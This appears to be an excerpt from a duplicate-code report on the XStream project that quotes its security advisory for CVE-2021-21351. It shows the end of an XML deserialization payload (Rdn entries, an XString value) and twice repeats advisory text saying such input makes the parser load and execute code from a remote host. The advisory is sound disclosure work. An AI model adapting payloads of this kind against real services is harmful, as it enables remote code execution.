XStream xstream = new XStream(); xstream.fromXML(xml);
Depending on the JDK, the code from the remote server is executed as soon as the XML gets unmarshalled or when another element is added to the set.
Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.
The vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream.
See workarounds for the different versions covering all CVEs.
wh1t3p1g G5-RD6@IIE found and reported the issue to XStream and provided the required information to reproduce it.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - xstream-distribution/src/content/CVE-2021-21351.html [102:132]: - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - </value> </javax.naming.ldap.Rdn_-RdnEntry> <javax.naming.ldap.Rdn_-RdnEntry> <type>ysomap</type> <value class='com.sun.org.apache.xpath.internal.objects.XString'> <m__obj class='string'>test</m__obj> </value> </javax.naming.ldap.Rdn_-RdnEntry> </sorted-set>XStream xstream = new XStream(); xstream.fromXML(xml);
Depending on the JDK, the code from the remote server is executed as soon as the XML gets unmarshalled or when another element is added to the set.
Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.
The vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream.
See workarounds for the different versions covering all CVEs.
wh1t3p1g G5-RD6@IIE found and reported the issue to XStream and provided the required information to reproduce it.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -